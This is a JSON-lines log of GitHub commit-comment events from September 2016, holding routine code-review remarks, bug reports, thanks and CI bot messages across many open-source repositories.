{"id":"4622577786","type":"CommitCommentEvent","actor":{"login":"tzuhan"},"repo":{"name":"tzuhan/clypdown"},"payload":{"comment":{"id":19186549,"position":null,"line":null,"path":null,"commit_id":"03518d24b5d896373ffb8b972d44ae6761f2abd0","created_at":"2016-09-27T08:06:21Z","updated_at":"2016-09-27T08:06:21Z","body":"fix some syntax errors and make changes in order to work in python3."}},"created_at":"2016-09-27T08:06:21Z"}
{"id":"4622580669","type":"CommitCommentEvent","actor":{"login":"ghikya"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19186552,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-27T08:07:02Z","updated_at":"2016-09-27T08:07:02Z","body":"Oh my god its working almost without textures glitches. But when!? Thank you very much @gregory38.  I'm looking all time on the site in the compatibility list, but it seems it's not updating. Thank you very much guys for Ratchet & Clank series games, I hope you'll manage to fix the remaining problems. "}},"created_at":"2016-09-27T08:07:02Z"}
{"id":"4622583048","type":"CommitCommentEvent","actor":{"login":"sekheng"},"repo":{"name":"sekheng/EntityComponentSystemExperiment"},"payload":{"comment":{"id":19186556,"position":null,"line":null,"path":null,"commit_id":"17b796c5e5672de34aa1c8ba5f59b7e764448042","created_at":"2016-09-27T08:07:33Z","updated_at":"2016-09-27T08:07:33Z","body":"It appears that the mysterious compilation error is caused by using the class or definition before defining it."}},"created_at":"2016-09-27T08:07:33Z"}
{"id":"4622588668","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19186562,"position":null,"line":null,"path":null,"commit_id":"d70515b9acd8b9776adb1398c8851913c695fac0","created_at":"2016-09-27T08:08:49Z","updated_at":"2016-09-27T08:08:49Z","body":"Results of sequential:\r\n0.68, 0.65, 0.65 (average: 0.66)\r\n"}},"created_at":"2016-09-27T08:08:49Z"}
{"id":"4622602573","type":"CommitCommentEvent","actor":{"login":"JanTvrdik"},"repo":{"name":"nette/tracy"},"payload":{"comment":{"id":19186579,"position":null,"line":null,"path":null,"commit_id":"5b83fa4a09755c50d783389495a3752dbd7edb69","created_at":"2016-09-27T08:11:48Z","updated_at":"2016-09-27T08:11:48Z","body":"This is a lot slower then the implementation in the PR for UTF-8 strings."}},"created_at":"2016-09-27T08:11:48Z"}
{"id":"4622605015","type":"CommitCommentEvent","actor":{"login":"lgatto"},"repo":{"name":"lgatto/MSnbase"},"payload":{"comment":{"id":19186583,"position":null,"line":null,"path":null,"commit_id":"66b6c37c2b3ac21eedd2fca026570eda5d14e848","created_at":"2016-09-27T08:12:21Z","updated_at":"2016-09-27T08:12:21Z","body":"@jotsetung - I'm fine with pushing to master. Feel free to create feature branches if you prefer, and then delete them accordingly. \r\n\r\nAs the code can't be reproduced, I would suggest to use `echo=FALSE` (but leave it there for information), as just have a short paragraph explaining the results. I think we would probably need more thorough testing (including parallel, as you mention). But that's for another time. "}},"created_at":"2016-09-27T08:12:21Z"}
{"id":"4622608937","type":"CommitCommentEvent","actor":{"login":"nagarkar"},"repo":{"name":"nagarkar/plasticsandpcbs"},"payload":{"comment":{"id":19186588,"position":null,"line":null,"path":null,"commit_id":"a38d17d7d613e6c44c8d9d76fa04af07c274c9ff","created_at":"2016-09-27T08:13:12Z","updated_at":"2016-09-27T08:13:12Z","body":"I don't see any new PRs from you. Last commit was several days ago. Are you\nsure you commited your changes and pushed to remote?\n\n[image: Inline image 1]\n\nOn Mon, Sep 26, 2016 at 11:41 PM, singhpri <notifications@github.com> wrote:\n\n> I have deleted app1 and renamed newapp as \"physicians-review\". Renamed the\n> components and added a local gitignore file as well. Please review and give\n> feedback.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nagarkar/plasticsandpcbs/commit/a38d17d7d613e6c44c8d9d76fa04af07c274c9ff#commitcomment-19185863>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFGMJnmL8Q5FmJ0JSKBAUgaW7UUV5s5Uks5quLp9gaJpZM4KHToW>\n> .\n>\n\n\n\n-- \nChinmay Nagarkar\nw: zuarix.com\np: 206-407-8536\n"}},"created_at":"2016-09-27T08:13:12Z"}
{"id":"4622610673","type":"CommitCommentEvent","actor":{"login":"dysonance"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186590,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T08:13:37Z","updated_at":"2016-09-27T08:13:37Z","body":"so what would be the best way to change it then? i assume if i edit the travis file on master the commit won't be pushed to this PR, or will it? "}},"created_at":"2016-09-27T08:13:37Z"}
{"id":"4622611347","type":"CommitCommentEvent","actor":{"login":"z3bratabs"},"repo":{"name":"wmutils/opt"},"payload":{"comment":{"id":19186591,"position":3,"line":1,"path":"README.md","commit_id":"5adbf58aa3f50f18fd0ebd6d1cae63d690b92475","created_at":"2016-09-27T08:13:45Z","updated_at":"2016-09-27T08:13:45Z","body":"mispelled"}},"created_at":"2016-09-27T08:13:45Z"}
{"id":"4622613418","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186595,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T08:14:14Z","updated_at":"2016-09-27T08:14:14Z","body":"What PR? This comment is on a commit in your repo. Just change .travis.yml on master"}},"created_at":"2016-09-27T08:14:14Z"}
{"id":"4622613742","type":"CommitCommentEvent","actor":{"login":"tyoshino"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19186596,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-27T08:14:19Z","updated_at":"2016-09-27T08:14:19Z","body":"@ricea, refactoring would be nice. Even we don't merge them, we can reduce code duplication to some extent, I guess.\r\n\r\nYour (2) might be also a good point regarding implementation details. It should be not impossible to have TransformStream and TextEncoder/Decoder on the same instance, but might lead to some challenge..."}},"created_at":"2016-09-27T08:14:19Z"}
{"id":"4622614382","type":"CommitCommentEvent","actor":{"login":"z3bratabs"},"repo":{"name":"wmutils/opt"},"payload":{"comment":{"id":19186597,"position":7,"line":5,"path":"README.md","commit_id":"5adbf58aa3f50f18fd0ebd6d1cae63d690b92475","created_at":"2016-09-27T08:14:27Z","updated_at":"2016-09-27T08:14:27Z","body":"It's meant to hold utilities that are optionnal"}},"created_at":"2016-09-27T08:14:27Z"}
{"id":"4622617999","type":"CommitCommentEvent","actor":{"login":"danielstocks"},"repo":{"name":"doomdavve/squash-ladder"},"payload":{"comment":{"id":19186609,"position":null,"line":null,"path":null,"commit_id":"192fed8c55cb042f03a82cca807030e5b6fb3ac1","created_at":"2016-09-27T08:15:15Z","updated_at":"2016-09-27T08:15:15Z","body":"Sluta jobba på semestern nu 😎 "}},"created_at":"2016-09-27T08:15:15Z"}
{"id":"4622619128","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186613,"position":6,"line":6,"path":"PowerSpace/PowerSpace/Drawable.h","commit_id":"e147f54e47c622a49273cb0fd9518a8a32d0a40f","created_at":"2016-09-27T08:15:30Z","updated_at":"2016-09-27T08:15:30Z","body":"Интерфейс определяет API. Из Вашего интерфейса следует, что объект можно только создать и разрушить. Где остальные методы?"}},"created_at":"2016-09-27T08:15:30Z"}
{"id":"4622626748","type":"CommitCommentEvent","actor":{"login":"huzhiming"},"repo":{"name":"sujing910206/ajax-pager"},"payload":{"comment":{"id":19186625,"position":null,"line":null,"path":null,"commit_id":"80586c930e90d153c70c2a1d7a6bbac2ad39b950","created_at":"2016-09-27T08:17:15Z","updated_at":"2016-09-27T08:17:15Z","body":"楼主，刚运行了你的源码，我把你的参数配置项nextLeast:0，最后还是会出现两个按钮。但你的preLeast这个参数是对的。"}},"created_at":"2016-09-27T08:17:15Z"}
{"id":"4622628323","type":"CommitCommentEvent","actor":{"login":"tylerdurden2010"},"repo":{"name":"knownsec/Pocsuite"},"payload":{"comment":{"id":19186627,"position":null,"line":null,"path":null,"commit_id":"24d63a0566e819201fd0b0f5176386c2a77903e5","created_at":"2016-09-27T08:17:36Z","updated_at":"2016-09-27T08:17:36Z","body":"When I use pyc POC, there is one error which is  register failed \"No module named net\""}},"created_at":"2016-09-27T08:17:36Z"}
{"id":"4622630891","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186631,"position":30,"line":30,"path":"PowerSpace/Editor/Main.cpp","commit_id":"9c6a35c326c40fb0b230a68551c1b656b2bc7b3f","created_at":"2016-09-27T08:18:10Z","updated_at":"2016-09-27T08:18:10Z","body":"Коммить закомментированный код - очень плохая практика. Потом никогда не можем понять зачем он был оставлен и что с ним теперь делать. Как минимум нужно добавить комментарий, поясняющий почему этот кусок кода сохранен в файле."}},"created_at":"2016-09-27T08:18:10Z"}
{"id":"4622635925","type":"CommitCommentEvent","actor":{"login":"habeIchVergessen"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19186640,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-27T08:19:19Z","updated_at":"2016-09-27T08:19:19Z","body":"\"**_:_**SD_WS:\" führender Doppelpunkt scheint nicht richtig zu sein"}},"created_at":"2016-09-27T08:19:19Z"}
{"id":"4622637101","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":19186641,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-27T08:19:35Z","updated_at":"2016-09-27T08:19:35Z","body":"Why do this?"}},"created_at":"2016-09-27T08:19:35Z"}
{"id":"4622637983","type":"CommitCommentEvent","actor":{"login":"afri18"},"repo":{"name":"eddieridwan/OpenSID"},"payload":{"comment":{"id":19186644,"position":null,"line":null,"path":null,"commit_id":"b063e5247ad81fcbda2c2bad87e2b876650ac2a4","created_at":"2016-09-27T08:19:46Z","updated_at":"2016-09-27T08:19:46Z","body":"mantab bung Eddie, saya berhasil menerapkannya\r\n![image](https://cloud.githubusercontent.com/assets/6611881/18865467/a18802e2-84c5-11e6-8379-0d211f655554.png)\r\ncuma untuk data penduduk lom bisa full fungsinya, karna saat menu Bantuan di kriteria Keluarga masih bermasalah, "}},"created_at":"2016-09-27T08:19:46Z"}
{"id":"4622643613","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19186654,"position":null,"line":null,"path":null,"commit_id":"ed61858f649f02c12e1953676d02c132955e2d2b","created_at":"2016-09-27T08:20:58Z","updated_at":"2016-09-27T08:20:58Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Hm4yXR-9Qjq1n-Vh75SfeA"}},"created_at":"2016-09-27T08:20:58Z"}
{"id":"4622643907","type":"CommitCommentEvent","actor":{"login":"Einsteino"},"repo":{"name":"OSDG-IIITH/CalenZone"},"payload":{"comment":{"id":19186656,"position":null,"line":null,"path":null,"commit_id":"398dae662891d89253ad0303121ac95d09b0a00e","created_at":"2016-09-27T08:21:02Z","updated_at":"2016-09-27T08:21:02Z","body":"Please rename commit to \"Display tag name instead of tag id in approval page\". \r\n👅 "}},"created_at":"2016-09-27T08:21:02Z"}
{"id":"4622644051","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19186658,"position":9,"line":82,"path":"semantics.json","commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T08:21:03Z","updated_at":"2016-09-27T08:21:03Z","body":"Why is this optional ? It does not make sense to not have anything ('-') selected here"}},"created_at":"2016-09-27T08:21:03Z"}
{"id":"4622646366","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19186663,"position":null,"line":null,"path":null,"commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T08:21:33Z","updated_at":"2016-09-27T08:21:33Z","body":"Language files has not been updated"}},"created_at":"2016-09-27T08:21:33Z"}
{"id":"4622647037","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186665,"position":null,"line":null,"path":null,"commit_id":"7102bf5faa9832fecb4988a27de8c4010a5b3d17","created_at":"2016-09-27T08:21:42Z","updated_at":"2016-09-27T08:21:42Z","body":"Мы всё-таки изучаем C++, а не Си. Код из примера надо отрефакторить. Убрать безумное количество макрописи, добавить объектно-ориентированности"}},"created_at":"2016-09-27T08:21:42Z"}
{"id":"4622647199","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19186667,"position":null,"line":null,"path":null,"commit_id":"3280e453f66055fa5547798dc3467b532da79bef","created_at":"2016-09-27T08:21:44Z","updated_at":"2016-09-27T08:21:44Z","body":"The user `show` has been disabled so it doesn't need to be blacklisted.\r\n\r\nThe difference here is that we don't get people used to ambiguous commands, by yelling at the user if they try to use an ambiguous command."}},"created_at":"2016-09-27T08:21:44Z"}
{"id":"4622651977","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19186679,"position":122,"line":120,"path":"squelette/js/ch04-05_BlueTriangles.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T08:22:47Z","updated_at":"2016-09-27T08:22:47Z","body":"It means that you know which kind of minifier you're willing to use and then be as lazy as possible.\r\n\r\nhttp://mislav.net/2010/05/semicolons/"}},"created_at":"2016-09-27T08:22:47Z"}
{"id":"4622652282","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":19186680,"position":null,"line":null,"path":null,"commit_id":"e4acb69a5378d5f9080579a0c3afc24a49036224","created_at":"2016-09-27T08:22:51Z","updated_at":"2016-09-27T08:22:51Z","body":"This is \"experiment\" phase ;)\r\n\r\nThat being said, the droid event loop is the GUI thread as far is CApplication is concerned, is it not?\r\n\r\nThe good news is that I get screenshots *including* the surfaceview bits, so rendercapture on surfaceview is a possibility, depending on the performances..."}},"created_at":"2016-09-27T08:22:51Z"}
{"id":"4622654233","type":"CommitCommentEvent","actor":{"login":"titanicboyke"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19186684,"position":8,"line":243,"path":"templates/map.html","commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T08:23:15Z","updated_at":"2016-09-27T08:23:15Z","body":"</div>"}},"created_at":"2016-09-27T08:23:15Z"}
{"id":"4622654662","type":"CommitCommentEvent","actor":{"login":"dcoutts"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":19186685,"position":136,"line":1368,"path":"cabal-install/Distribution/Client/ProjectBuilding.hs","commit_id":"ab95e52e62a1e080e9bdfb04b5c5212a29cfa357","created_at":"2016-09-27T08:23:21Z","updated_at":"2016-09-27T08:23:21Z","body":"Note: this moving of stuff around is to keep `withTempInstalledPackageInfoFile` in the same section that uses it, so we can insert a new section at the end just above the utils section."}},"created_at":"2016-09-27T08:23:21Z"}
{"id":"4622657472","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186691,"position":25,"line":25,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-27T08:23:57Z","updated_at":"2016-09-27T08:23:57Z","body":"Зачем нужен такой метод? Прочитайте про RAII и unique_ptr. "}},"created_at":"2016-09-27T08:23:57Z"}
{"id":"4622664421","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186704,"position":62,"line":62,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-27T08:25:23Z","updated_at":"2016-09-27T08:25:23Z","body":"Зачем эта функция принимает параметр, если он всё равно переопределяется в коде?"}},"created_at":"2016-09-27T08:25:23Z"}
{"id":"4622666486","type":"CommitCommentEvent","actor":{"login":"losipiuk"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":19186709,"position":51,"line":382,"path":"presto-main/src/main/java/com/facebook/presto/operator/OperatorContext.java","commit_id":"b1e469442aefe9c9f206d5b02c68b7706525988c","created_at":"2016-09-27T08:25:49Z","updated_at":"2016-09-27T08:25:49Z","body":"@pnowojski I dropped the comment and replaced the code to:\r\n```java\r\n        while (true) {\r\n            SettableFuture<?> currentFuture = systemMemoryRevokingRequestedFuture.get();\r\n            if (!currentFuture.isDone()) {\r\n                return;\r\n            }\r\n            if (systemMemoryRevokingRequestedFuture.compareAndSet(currentFuture, SettableFuture.create())) {\r\n                return;\r\n            }\r\n        }\r\n```\r\n\r\nIt should be fine as nobody should call this method if revoking was not requested before anyway. And if it was requested nobody should trigger another request."}},"created_at":"2016-09-27T08:25:49Z"}
{"id":"4622668564","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186714,"position":170,"line":170,"path":"PowerSpace/Editor/DrawableEditor.cpp","commit_id":"a6880ce8bb27bf4f82688a276a6da41acc68e99f","created_at":"2016-09-27T08:26:15Z","updated_at":"2016-09-27T08:26:15Z","body":"Ещё раз про RAII и unique_ptr"}},"created_at":"2016-09-27T08:26:15Z"}
{"id":"4622668825","type":"CommitCommentEvent","actor":{"login":"kojiclatoolkit"},"repo":{"name":"clatoolkitdev/GitHubIntegrationTest"},"payload":{"comment":{"id":19186715,"position":null,"line":null,"path":null,"commit_id":"78567975c3d8f217f8e3da46ce37aab1e3ac3cb7","created_at":"2016-09-27T08:26:19Z","updated_at":"2016-09-27T08:26:19Z","body":"This should be a commit comments..."}},"created_at":"2016-09-27T08:26:19Z"}
{"id":"4622670623","type":"CommitCommentEvent","actor":{"login":"kojiclatoolkit"},"repo":{"name":"clatoolkitdev/GitHubIntegrationTest"},"payload":{"comment":{"id":19186718,"position":null,"line":null,"path":null,"commit_id":"ab31a940fcbe098208add0e42e3c2a82396e48b4","created_at":"2016-09-27T08:26:40Z","updated_at":"2016-09-27T08:26:40Z","body":"This is also commit comment, isn't it?"}},"created_at":"2016-09-27T08:26:40Z"}
{"id":"4622670789","type":"CommitCommentEvent","actor":{"login":"bassjobsen"},"repo":{"name":"bassjobsen/Bootstrap-3-Typeahead"},"payload":{"comment":{"id":19186721,"position":null,"line":null,"path":null,"commit_id":"7b59699d14865a3b7355c0e05f7a9cdc75f7e8e4","created_at":"2016-09-27T08:26:42Z","updated_at":"2016-09-27T08:26:42Z","body":"updated to version 4.0.2 on npm too! @jochenberger "}},"created_at":"2016-09-27T08:26:42Z"}
{"id":"4622674214","type":"CommitCommentEvent","actor":{"login":"titanicboyke"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19186724,"position":8,"line":243,"path":"templates/map.html","commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T08:27:25Z","updated_at":"2016-09-27T08:27:25Z","body":"+ `</div>`"}},"created_at":"2016-09-27T08:27:25Z"}
{"id":"4622674406","type":"CommitCommentEvent","actor":{"login":"clatoolkitdev"},"repo":{"name":"clatoolkitdev/GitHubIntegrationTest"},"payload":{"comment":{"id":19186726,"position":null,"line":null,"path":null,"commit_id":"a0160150204a593f705c086dd1c365eacfce244e","created_at":"2016-09-27T08:27:27Z","updated_at":"2016-09-27T08:27:27Z","body":"Can you see me as a commit comment??"}},"created_at":"2016-09-27T08:27:27Z"}
{"id":"4622675861","type":"CommitCommentEvent","actor":{"login":"ricea"},"repo":{"name":"whatwg/encoding"},"payload":{"comment":{"id":19186728,"position":null,"line":null,"path":null,"commit_id":"9224c4cad81fd5720306fe79241cf04b5526a3f0","created_at":"2016-09-27T08:27:43Z","updated_at":"2016-09-27T08:27:43Z","body":"Thank you for all the feedback! I will update this branch next week.\r\n\r\nThis week I am busy with something else."}},"created_at":"2016-09-27T08:27:43Z"}
{"id":"4622677485","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19186735,"position":null,"line":null,"path":null,"commit_id":"51519bffb53517dfecf3a9a65d0ff8399a554168","created_at":"2016-09-27T08:28:03Z","updated_at":"2016-09-27T08:28:03Z","body":"В языке C++ есть такая штука - const. Ей нужно пользоваться, хотя бы в двух случаях:\r\n1) Константные методы\r\n2) Константные ссылки и указатели, особенно в аргументах функции"}},"created_at":"2016-09-27T08:28:03Z"}
{"id":"4622679025","type":"CommitCommentEvent","actor":{"login":"titanicboyke"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19186737,"position":9,"line":244,"path":"templates/map.html","commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T08:28:23Z","updated_at":"2016-09-27T08:28:23Z","body":"+ `<div class=\"form-control switch-container\">`"}},"created_at":"2016-09-27T08:28:23Z"}
{"id":"4622684256","type":"CommitCommentEvent","actor":{"login":"titanicboyke"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19186748,"position":8,"line":243,"path":"templates/map.html","commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T08:29:26Z","updated_at":"2016-09-27T08:29:26Z","body":"+ `<div class=\"form-control switch-container\">`"}},"created_at":"2016-09-27T08:29:26Z"}
{"id":"4622684725","type":"CommitCommentEvent","actor":{"login":"cloud03"},"repo":{"name":"cloud03/cloud03_project"},"payload":{"comment":{"id":19186749,"position":null,"line":null,"path":null,"commit_id":"631f55da6fac02e5f793de290a08bdde15bf0683","created_at":"2016-09-27T08:29:32Z","updated_at":"2016-09-27T08:29:32Z","body":"hello world guys!"}},"created_at":"2016-09-27T08:29:32Z"}
{"id":"4622685068","type":"CommitCommentEvent","actor":{"login":"vlakoff"},"repo":{"name":"notepad-plus-plus/notepad-plus-plus"},"payload":{"comment":{"id":19186750,"position":null,"line":null,"path":null,"commit_id":"f71fd6c63f62384e602fc5b953b9d59ae9d9ab69","created_at":"2016-09-27T08:29:36Z","updated_at":"2016-09-27T08:29:36Z","body":"Mmmm, I disagree with this change…"}},"created_at":"2016-09-27T08:29:36Z"}
{"id":"4622685087","type":"CommitCommentEvent","actor":{"login":"bnussey"},"repo":{"name":"argonjs/nativescript-screen-orientation"},"payload":{"comment":{"id":19186751,"position":null,"line":null,"path":null,"commit_id":"d18a3bb17fd986f7843efd0b81e2727ff91a3a07","created_at":"2016-09-27T08:29:37Z","updated_at":"2016-09-27T08:29:37Z","body":"Hey @blairmacintyre does this work for you? Doesn't seem to be working for me on device or simulator"}},"created_at":"2016-09-27T08:29:37Z"}
{"id":"4622688725","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19186758,"position":36,"line":118,"path":"squelette/jsExos/ALEX_CH04.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T08:30:24Z","updated_at":"2016-09-27T08:30:24Z","body":"`setInterval` doesn't give you the asked framerate. The only safe solution is to measure `when` you are.\r\n\r\n```js\r\nanimate() {\r\n    requestAnimationFrame(animate);\r\n    var frame = performance.now()/15|1;\r\n    ...\r\n}\r\n```\r\n\r\nStolen from Mathieu \"p01\" Henri :wink: \r\n\r\nPS: `indexCounter` is possibly the worst variable name you could pick for that."}},"created_at":"2016-09-27T08:30:24Z"}
{"id":"4622689077","type":"CommitCommentEvent","actor":{"login":"gustavocortesl"},"repo":{"name":"gustavocortesl/townreportapi"},"payload":{"comment":{"id":19186760,"position":null,"line":null,"path":null,"commit_id":"86cf89ca45ee6c0112ce888f7a4fddd4b7ac15c8","created_at":"2016-09-27T08:30:29Z","updated_at":"2016-09-27T08:30:29Z","body":"Problem location cannot be updated, it's supposed the problems don't move."}},"created_at":"2016-09-27T08:30:29Z"}
{"id":"4622693544","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19186768,"position":null,"line":null,"path":null,"commit_id":"2aac83173bbf0f92e0737b596988034aec3edbe0","created_at":"2016-09-27T08:31:24Z","updated_at":"2016-09-27T08:31:24Z","body":"@ElbertoOne It is just my intuition (and some recent experience)... Hope that works! :-)"}},"created_at":"2016-09-27T08:31:24Z"}
{"id":"4622695673","type":"CommitCommentEvent","actor":{"login":"clatoolkitdev"},"repo":{"name":"clatoolkitdev/GitHubIntegrationTest"},"payload":{"comment":{"id":19186773,"position":null,"line":null,"path":null,"commit_id":"78567975c3d8f217f8e3da46ce37aab1e3ac3cb7","created_at":"2016-09-27T08:31:51Z","updated_at":"2016-09-27T08:31:51Z","body":"yeah I has to be..."}},"created_at":"2016-09-27T08:31:51Z"}
{"id":"4622698792","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19186780,"position":null,"line":null,"path":null,"commit_id":"fc8b54ec86c17f9e634cc4c1c568abcdc975c6c7","created_at":"2016-09-27T08:32:30Z","updated_at":"2016-09-27T08:32:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1167](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14279&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T08:32:30Z"}
{"id":"4622700338","type":"CommitCommentEvent","actor":{"login":"clatoolkitdev"},"repo":{"name":"clatoolkitdev/GitHubIntegrationTest"},"payload":{"comment":{"id":19186787,"position":null,"line":null,"path":null,"commit_id":"78567975c3d8f217f8e3da46ce37aab1e3ac3cb7","created_at":"2016-09-27T08:32:50Z","updated_at":"2016-09-27T08:32:50Z","body":"test comment with **bold** and _italic_ effect"}},"created_at":"2016-09-27T08:32:50Z"}
{"id":"4622702142","type":"CommitCommentEvent","actor":{"login":"snolflake"},"repo":{"name":"preboot/angular2-webpack"},"payload":{"comment":{"id":19186793,"position":null,"line":null,"path":null,"commit_id":"c668fc32e25b792d09e280833086948d22cac864","created_at":"2016-09-27T08:33:12Z","updated_at":"2016-09-27T08:33:12Z","body":"@gohilumesh This is either a bug or a misconfiguration on your atom-typescript maybe @basarat can help"}},"created_at":"2016-09-27T08:33:12Z"}
{"id":"4622703909","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19186798,"position":4,"line":261,"path":"src/raft/log_unstable.rs","commit_id":"158cb2d3b5a8fdaaf323b92d9b3434d2343ba915","created_at":"2016-09-27T08:33:32Z","updated_at":"2016-09-27T08:33:32Z","body":"Please also send a PR to etcd."}},"created_at":"2016-09-27T08:33:32Z"}
{"id":"4622708176","type":"CommitCommentEvent","actor":{"login":"NikoKrause"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19186804,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-27T08:34:20Z","updated_at":"2016-09-27T08:34:20Z","body":"@mtwebster \r\nNow after you reverted keyboard applet code, I see the right flag and the right letters for Russian (Germany, phonetic)"}},"created_at":"2016-09-27T08:34:20Z"}
{"id":"4622709643","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19186806,"position":null,"line":null,"path":null,"commit_id":"52ba0552a4107178e95b1d7f618ccdc761212885","created_at":"2016-09-27T08:34:38Z","updated_at":"2016-09-27T08:34:38Z","body":"A wild ensure_one appears !"}},"created_at":"2016-09-27T08:34:38Z"}
{"id":"4622712892","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186812,"position":21,"line":37,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:35:18Z","updated_at":"2016-09-27T08:35:18Z","body":"Do we prefer `_.isNaN()` over `isNaN()` and `Number.isNaN()`?"}},"created_at":"2016-09-27T08:35:18Z"}
{"id":"4622715975","type":"CommitCommentEvent","actor":{"login":"AntoineLemaire"},"repo":{"name":"PaylineByMonext/payline-php-sdk"},"payload":{"comment":{"id":19186824,"position":6,"line":1578,"path":"src/Payline/PaylineSDK.php","commit_id":"227bccf76fdd0e549a0f5be1ad9193f69b200bd9","created_at":"2016-09-27T08:35:56Z","updated_at":"2016-09-27T08:35:56Z","body":"According to `v4.47.1.wsdl`\r\n     ```<element minOccurs=\"0\" name=\"generateVirtualCvx\" nillable=\"true\" type=\"xsd:string\"/>```\r\n\r\n`generateVirtualCvx` should not be optionnal?\r\n\r\n    if (isset($array['generateVirtualCvx'])) {\r\n        $WSRequest['generateVirtualCvx'] = $array['generateVirtualCvx'];\r\n    }"}},"created_at":"2016-09-27T08:35:56Z"}
